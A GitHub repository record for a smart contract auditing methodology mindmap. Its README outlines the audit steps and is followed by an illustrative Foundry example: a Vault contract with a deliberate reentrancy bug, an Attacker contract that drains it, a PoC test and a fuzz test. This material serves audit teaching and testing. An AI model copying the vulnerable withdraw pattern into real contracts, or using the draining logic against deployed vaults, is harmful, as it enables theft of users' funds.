{"id":19564296,"url":"https://github.com/quillhash/smart-contract-auditing-methodology-mindmap","last_synced_at":"2025-05-07T15:23:33.845Z","repository":{"id":62956152,"uuid":"561767553","full_name":"Quillhash/Smart-contract-Auditing-Methodology-mindmap","owner":"Quillhash","description":"This repository contains a mindmap on smart contract auditing methodology and different steps in how to audit a smart contract.","archived":false,"fork":false,"pushed_at":"2024-02-20T06:58:52.000Z","size":938,"stargazers_count":184,"open_issues_count":0,"forks_count":31,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-31T11:22:00.098Z","etag":null,"topics":["blockchain","hacking","smartcontract-security","smartcontracts","solidity"],"latest_commit_sha":null,"homepage":"https://www.quillaudits.com/smart-contract-audit","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Quillhash.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-11-04T12:55:36.000Z","updated_at":"2025-03-03T07:41:41.000Z","dependencies_parsed_at":"2024-02-20T07:52:33.799Z","dependency_job_id":null,"html_url":"https://github.com/Quillhash/Smart-contract-Auditing-Methodology-mindmap","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Quillhash%2FSmart-contract-Auditing-Methodology-mindmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Quillhash%2FSmart-contract-Auditing-Methodology-mindmap/tags","releases_
url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Quillhash%2FSmart-contract-Auditing-Methodology-mindmap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Quillhash%2FSmart-contract-Auditing-Methodology-mindmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Quillhash","download_url":"https://codeload.github.com/Quillhash/Smart-contract-Auditing-Methodology-mindmap/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252903319,"owners_count":21822424,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blockchain","hacking","smartcontract-security","smartcontracts","solidity"],"created_at":"2024-11-11T05:21:17.187Z","updated_at":"2025-05-07T15:23:33.821Z","avatar_url":"https://github.com/Quillhash.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Smart-contract-Auditing-Methodology-mindmap\n\n![Untitled](data/Auditing-methodology-quillaudits.png)\n\nPDF Version: [Auditing-Methodology-Mindmap](data/Auditing-methodology-quillaudits.pdf)\n\nMindmap Link: [https://xmind.works/share/LoZXVn0y](https://xmind.works/share/LoZXVn0y)\n\n\n## 1. Information Gathering:\n\n1. Read the technical documentation of the project.\n2. Understand what the project wants to deliver.\n3. Look for any undocumented features (behaviour present in the code but absent from the docs).\n4. Read the project's whitepaper.\n\n## 2. Understanding the Code:\n\n1. Read the code line by line.\n2. Understand the core logic of the contracts.\n3. 
Review the business logic in detail, together with the smart contract architecture.\n4. Build an access control map (who can call which privileged function) and a fund flow map (where value enters, is held, and leaves).\n\n## 3. Static analysis by automated tools.\n\n1. [Mythx](https://mythx.io/)\n2. [Slither](https://github.com/crytic/slither)\n3. [Mythril](https://github.com/ConsenSys/mythril)\n4. [Manticore](https://github.com/trailofbits/manticore)\n5. Manually verify every result: these tools generate many false positives, and they do not find business-logic bugs, so a clean run is not a clean contract.\n\n## 4. Test against the standard list of vulnerabilities.\n\n1. [SWC Registry](https://swcregistry.io/)\n2. [Solidity Attack Vectors](https://github.com/Quillhash/Solidity-Attack-Vectors)\n3. [List-of-Security-Vulnerabilities](https://github.com/runtimeverification/verified-smart-contracts/wiki/List-of-Security-Vulnerabilities)\n\n## 5. Functional Testing:\n\n1. Run the unit tests provided by the auditee.\n2. Functional testing for various edge-case scenarios.\n3. Write PoCs for the manual findings:\n    1. [Hardhat](https://hardhat.org/hardhat-runner/docs/getting-started#overview)\n    2. [Foundry](https://github.com/foundry-rs/foundry)\n    3. [Brownie](https://eth-brownie.readthedocs.io/en/stable/) (deprecating soon)\n    4. [Ape](https://docs.apeworx.io/ape/stable/index.html)\n    5. [Truffle](https://trufflesuite.com/)\n4. [Remix deployment [Optional]](https://remix.ethereum.org/)\n5. Gas optimization test reports\n\n## 6. Fuzz Testing\n\n1. [Echidna](https://github.com/crytic/echidna)\n2. [Foundry Fuzz-Testing](https://book.getfoundry.sh/forge/fuzz-testing)\n\n## 7. Provide Recommendations and Generating Reports\n\n1. Provide recommendations and fixes for bugs.\n2. 
Audit report preparation and Final submission.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fquillhash%2Fsmart-contract-auditing-methodology-mindmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fquillhash%2Fsmart-contract-auditing-methodology-mindmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fquillhash%2Fsmart-contract-auditing-methodology-mindmap/lists"}
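Worked example for steps 5 and 6 of the methodology in the README above (writing a PoC for a manual finding, then fuzz-testing an invariant with Foundry). This is an added illustration, not code from the Quillhash repository or from any audited project: the `Vault` contract, the `Attacker` helper, the addresses and the test names are hypothetical, and the harness assumes forge-std is installed in a Foundry project. The finding being reproduced is a classic reentrancy (external call before state update, SWC-107 in the SWC Registry linked in step 4).

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

// Hypothetical target contract (not from any real project): a minimal ETH vault
// whose withdraw() sends ETH before zeroing the balance, i.e. the manual finding
// that the PoC below turns into a reproducible test.
contract Vault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        // BUG (kept on purpose): external call happens before the state update
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0;
    }
}

// Attacker helper for the PoC: re-enters withdraw() from receive() while the
// vault still has ETH, so the stale balance is paid out repeatedly.
contract Attacker {
    Vault public vault;

    constructor(Vault _vault) {
        vault = _vault;
    }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    receive() external payable {
        if (address(vault).balance >= 1 ether) {
            vault.withdraw();
        }
    }
}

contract VaultTest is Test {
    Vault vault;
    address victim = makeAddr("victim");     // hypothetical honest depositor
    address attacker = makeAddr("attacker"); // hypothetical attacker EOA

    function setUp() public {
        vault = new Vault();
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        vault.deposit{value: 10 ether}();
    }

    // Step 5: PoC for the manual finding. Once the bug is fixed (state update
    // before the call), the nested withdraw() reverts and this test fails,
    // which is exactly how the auditor later verifies the remediation.
    function test_PoC_reentrancyDrainsVault() public {
        vm.deal(attacker, 1 ether);
        vm.startPrank(attacker);
        Attacker a = new Attacker(vault);
        a.attack{value: 1 ether}();
        vm.stopPrank();

        assertEq(address(vault).balance, 0, "vault should be drained");
        assertEq(address(a).balance, 11 ether, "attacker holds the victim's 10 ETH plus its own 1 ETH");
    }

    // Step 6: Foundry fuzz test over a deposit/withdraw round trip by an honest
    // user. The property checked is the solvency invariant the reentrancy PoC
    // violates: an honest user gets back exactly their deposit and the vault
    // still covers every other depositor. Foundry drives `amount` with random
    // values; vm.assume discards the zero case that withdraw() rejects by design.
    function testFuzz_honestDepositWithdraw(uint96 amount) public {
        vm.assume(amount > 0);
        address user = makeAddr("user");
        vm.deal(user, amount);
        vm.startPrank(user);
        vault.deposit{value: amount}();
        vault.withdraw();
        vm.stopPrank();

        assertEq(user.balance, amount, "honest user gets exactly their deposit back");
        assertGe(address(vault).balance, vault.balances(victim), "vault still covers other depositors");
    }
}
```

Run it with `forge test --match-contract VaultTest -vvv`; the PoC test should pass against the vulnerable contract and fail after the fix, and the fuzz test runs `amount` through the default number of Foundry fuzz runs. Keeping the PoC as a test file in the audit deliverable gives the auditee a regression check for the fix, which is the point of step 7's recommendations.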